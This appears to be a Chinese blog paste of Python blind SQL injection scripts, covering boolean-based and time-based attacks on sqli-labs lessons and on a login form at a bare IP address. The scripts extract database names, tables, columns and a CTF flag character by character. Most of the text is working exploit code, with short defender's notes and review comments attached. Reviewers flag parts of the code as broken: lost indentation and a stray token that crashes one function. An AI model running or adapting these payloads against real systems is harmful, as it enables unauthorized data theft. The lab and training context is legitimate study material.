- 链接:https://pan.baidu.com/s/1Uw51GRmAA3BRyFSTyVh9nA
提取码:1234
--来自百度网盘超级会员V3的分享
import requests
# One Session is reused for every probe so cookies and the connection pool are shared.
session = requests.Session()
# Target is a local copy of the sqli-labs teaching lab (Less-8).  The id value
# carries a trailing single quote; the payloads built below are simply appended
# to this string.  Boolean-based blind injection with a binary search over the
# character code -- this first script dumps the database name.
# Defender's note: the lab's root cause is string-concatenated SQL; a
# parameterized query removes the oracle entirely.  Each character costs the
# attacker ~7 near-identical requests containing ascii(substr(...)), which is
# an easy pattern to spot in access logs.
url = "http://caichuanqi.cn/lab/sqli-labs-master/Less-8/?id=1'"
def name() -> None:
    """Recover the current database name one character at a time.

    For each position ``i`` a binary search over character codes 32..127 is
    driven by the page's true/false marker: the payload asks whether
    ``ascii(substr(database(), i, 1))`` is greater than the midpoint ``tmp``,
    and the presence of ``'You are in...........'`` in the response body is
    treated as "true".  Every recovered character is appended to the local
    ``name`` and the running string is printed once at the end.

    The local variable ``name`` shadows the function's own name inside the
    body; this is harmless because the module-level call below resolves the
    global.
    """
    name = ''
    for i in range(1, 50):
        begin = 32
        end = 128
        tmp = (begin + end) // 2
        while begin < end:
            # Strict ">" comparison, so the search narrows to the exact code.
            paramsPost = "and/**/ascii(substr(database(),{0},1))>{1}-- -" .format(i,tmp)
            response = session.get(url+paramsPost)
            if 'You are in...........' in response.text:
                # Condition held: the real code is above tmp.
                begin = tmp + 1
                tmp = (begin + end) // 2
            else:
                # Condition failed (or substr() returned ''): the code is <= tmp.
                end = tmp
                tmp = (begin + end) // 2
        # NOTE(review): indentation was lost in this paste; the end-of-string
        # check is placed after the while loop, which is the only reading under
        # which the for loop terminates sensibly -- confirm against the original.
        # When substr() yields '' the comparison is never true, so the search
        # bottoms out at 32; that value is used as the end-of-name sentinel.
        if(tmp==32):
            break;
        name += chr(tmp)
    print(name)


def table() -> None:
    """Recover the comma-joined list of table names in the current schema.

    Same binary search as :func:`name`, but the probed expression is
    ``group_concat(table_name)`` over ``information_schema.tables`` filtered
    to ``database()``.  Original inline comment: "dump table names".
    """
    name = ''
    for i in range(1,50):
        # NOTE(review): stray token `a` on this line in the original paste -- it
        # raises NameError on the first iteration and looks like an editing
        # artifact; kept here unchanged.
        a
        begin = 32
        end = 128
        tmp = (begin + end) // 2
        while begin < end:
            paramsPost = "and/**/ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{0},1))>{1}-- -" .format(i,tmp)
            response = session.get(url+paramsPost)
            if 'You are in...........' in response.text:
                begin = tmp + 1
                tmp = (begin + end) // 2
            else:
                end = tmp
                tmp = (begin + end) // 2
        # NOTE(review): placed after the while loop for the same reason as in name().
        # 32 is again the end-of-string sentinel.
        if(tmp==32):
            break;
        name += chr(tmp)
    print(name)


name()
table()
# --- 徐老师的脚本 (Teacher Xu's script): boolean-based blind injection against a POST login form ---
import requests
session = requests.Session() #post表单页面布尔判断注入
def name() -> None:
    """Recover a username from a login form by boolean-based blind injection.

    The form is submitted by POST.  The ``username`` value is the literal
    ``admin\\`` (the word followed by one backslash) and the ``password`` value
    carries the injected condition, so the injection point is the password
    field.  For each ``j`` (0..99) the probe compares
    ``Ascii(right(username, j+1))`` against a binary-search midpoint; the
    string ``'success.jpg'`` in the response is treated as "true".

    Presumably ``right(s, j+1)`` yields the last ``j+1`` characters and
    ``Ascii`` takes the first of them, i.e. the (j+1)-th character counted from
    the end -- so ``name`` is built in reverse order.  Unlike the Less-8
    script there is no end-of-string check: all 100 positions are probed and a
    character (32 for an empty result) is appended every time.

    The local ``name`` shadows the function name; harmless, see the call below.
    """
    name = ''
    for j in range(100):
        begin = 32
        end = 128
        tmp = (begin + end) // 2
        while begin < end:
            # Fresh dict on every probe; only the password value changes.
            paramsPost = {"password": "kawhi", "username": "admin\\"}
            paramsPost['password'] = "or/**/Ascii(right((username),%d))>%d#"%(j+1,tmp)
            # Debug output: prints the form data sent for every probe.
            print(paramsPost)
            response = session.post("http://81.70.89.91:33013/index.php",data=paramsPost)
            if 'success.jpg' in response.text:
                begin = tmp + 1
                tmp = (begin + end) // 2
            else:
                end = tmp
                tmp = (begin + end) // 2
        name += chr(tmp)
    print(name)


name()
# --- 蔡老师的脚本 (Teacher Cai's script): time-based blind injection against sqli-labs ---
import requests
import time
import datetime
# Target: local sqli-labs Less-9 (the time-based blind lesson); the id value
# ends with a single quote.  The Less-4 variant below was left commented out by
# the author.  Note that `time` is imported above but never used -- all timing
# below goes through datetime.
# Defender's note: a timing oracle only exists because the query result can
# influence response latency; parameterized queries close it, and bursts of
# requests whose query string contains sleep()/if()/information_schema are a
# reliable log-review or WAF signature.
url = "http://127.0.0.1/sqlilabs/Less-9/?id=1'"
#url = "http://127.0.0.1/sqlilabs/Less-4/?id=1"
def get_dbname() -> None:
    """Recover the database name (positions 1..8) by time-based blind injection.

    For each position ``i`` every character code ``k`` in 32..126 is tried in
    turn -- a linear scan, not the binary search used by the boolean scripts.
    The payload wraps the equality test in ``if(..., sleep(2), 1)``, so a
    matching ``k`` delays the response; a round trip whose whole-seconds
    component exceeds 1 (i.e. at least 2 s) is taken as a hit.  The scan does
    not stop after a hit, so the remaining ``k`` values are still probed.
    """
    dbname = ''
    for i in range(1,9):
        for k in range(32,127):
            payload = " and if(ascii(substr(database(),{0},1))={1},sleep(2),1)--+".format(i,k)
            # Alternative payload shapes the author tried, kept for reference:
            #payload = '") and if(ascii(substr(database(),{0},1))={1},sleep(2),1)--+'.format(i,k)
            # payload = " and if(ascii(substr(database(),{0},1))={1},sleep(2),1) --+".format(i,k)
            # sleep(2) inside if(): when the injected condition is true the server
            # sleeps for two seconds; the two branches could be swapped so that a
            # false condition sleeps instead.
            time1 = datetime.datetime.now()
            # timestamp taken before the request is sent
            res = requests.get(url + payload)
            time2 = datetime.datetime.now()
            # timestamp taken after the response arrives
            difference = (time2 - time1).seconds
            # elapsed time; .seconds is only the whole-seconds field of the timedelta
            if difference > 1:
                dbname += chr(k)
            else:
                continue
    print("数据库名为->"+dbname)


get_dbname()
def get_table() -> None:
    """Recover up to four table names of schema 'security' by time-based blind injection.

    Outer loop ``i`` selects the ``i``-th row of ``information_schema.tables``
    (``limit i,1``), ``j`` the character position (0..5) and ``k`` the
    character code.  A hit is a response delayed by ``sleep(2)`` (whole
    seconds > 1).  Only ``i`` in {0, 1, 3, 4} has a branch below; there is no
    branch for ``i == 2``, so characters found for that row fall into the
    ``else`` and are discarded.
    """
    table1 = ''
    table2 = ''
    table3 = ''
    table4 = ''
    for i in range(5):
        for j in range(6):
            for k in range(32,127):
                payload = "and if(ascii(substr((select table_name from information_schema.tables where table_schema=\'security\' limit %d,1),%d,1))=%d,sleep(2),1)--+"%(i,j,k)
                time1 = datetime.datetime.now()
                res = requests.get(url + payload)
                time2 = datetime.datetime.now()
                difference = (time2-time1).seconds
                if difference > 1:
                    if i == 0:
                        table1 += chr(k)
                        print("第一个表为->"+table1)
                    elif i == 1:
                        table2 += chr(k)
                        print("第二个表为->"+table2)
                    elif i == 3:
                        table3 += chr(k)
                        print("第三个表为->"+table3)
                    elif i == 4:
                        table4 += chr(k)
                        print("第四个表为->"+table4)
                    else:
                        # NOTE(review): indentation was lost in the paste; this
                        # else is read as the tail of the `if i == ...` chain
                        # (the other placement would break the k scan on the
                        # first non-delayed response) -- confirm against the original.
                        break


get_table()
def get_column() -> None:
    """Recover up to three column names of table 'flag' by time-based blind injection.

    Loop structure mirrors :func:`get_table`: ``i`` is the row of
    ``information_schema.columns`` (``limit i,1``), ``j`` the character
    position (1..8), ``k`` the character code; a delayed response is a hit.

    The three ``if i == ...`` tests are independent ``if`` statements, so the
    trailing ``else: break`` belongs to ``if i == 2``: after a hit for
    ``i == 0`` or ``i == 1`` the ``k`` scan stops early, while for ``i == 2``
    it keeps running through the remaining codes.
    """
    column1 = ''
    column2 = ''
    column3 = ''
    for i in range(3):
        for j in range(1,9):
            for k in range(32,127):
                payload = "and if(ascii(substr((select column_name from information_schema.columns where table_name=\'flag\' limit %d,1),%d,1))=%d,sleep(2),1)--+"%(i,j,k)
                time1 = datetime.datetime.now()
                res = requests.get(url+payload)
                time2 = datetime.datetime.now()
                difference = (time2-time1).seconds
                if difference > 1:
                    if i == 0:
                        column1 += chr(k)
                        print("字段一为->"+column1)
                    if i == 1:
                        column2 += chr(k)
                        print("字段二为->"+column2)
                    if i == 2:
                        column3 += chr(k)
                        print("字段三为->"+column3)
                    else:
                        # NOTE(review): indentation was lost in the paste; this
                        # else is read as attached to `if i == 2` inside the
                        # delay branch -- confirm against the original.
                        break


get_column()


def get_flag() -> None:
    """Recover the value of ``flag.flag`` (positions 0..29) by time-based blind injection.

    Linear scan over character codes per position, same delay heuristic as
    the other functions; note that ``i`` starts at 0 here, unlike
    :func:`get_dbname`.  There is no early exit after a hit.
    """
    flag = ''
    for i in range(30):
        for k in range(32,127):
            payload = "and if(ascii(substr((select flag from flag),%d,1))=%d,sleep(2),1)--+"%(i,k)
            time1 = datetime.datetime.now()
            res = requests.get(url+payload)
            time2 = datetime.datetime.now()
            difference = (time2-time1).seconds
            if difference > 1:
                flag += chr(k)
                print("flag为->"+flag)


get_flag()
sql注入之盲注脚本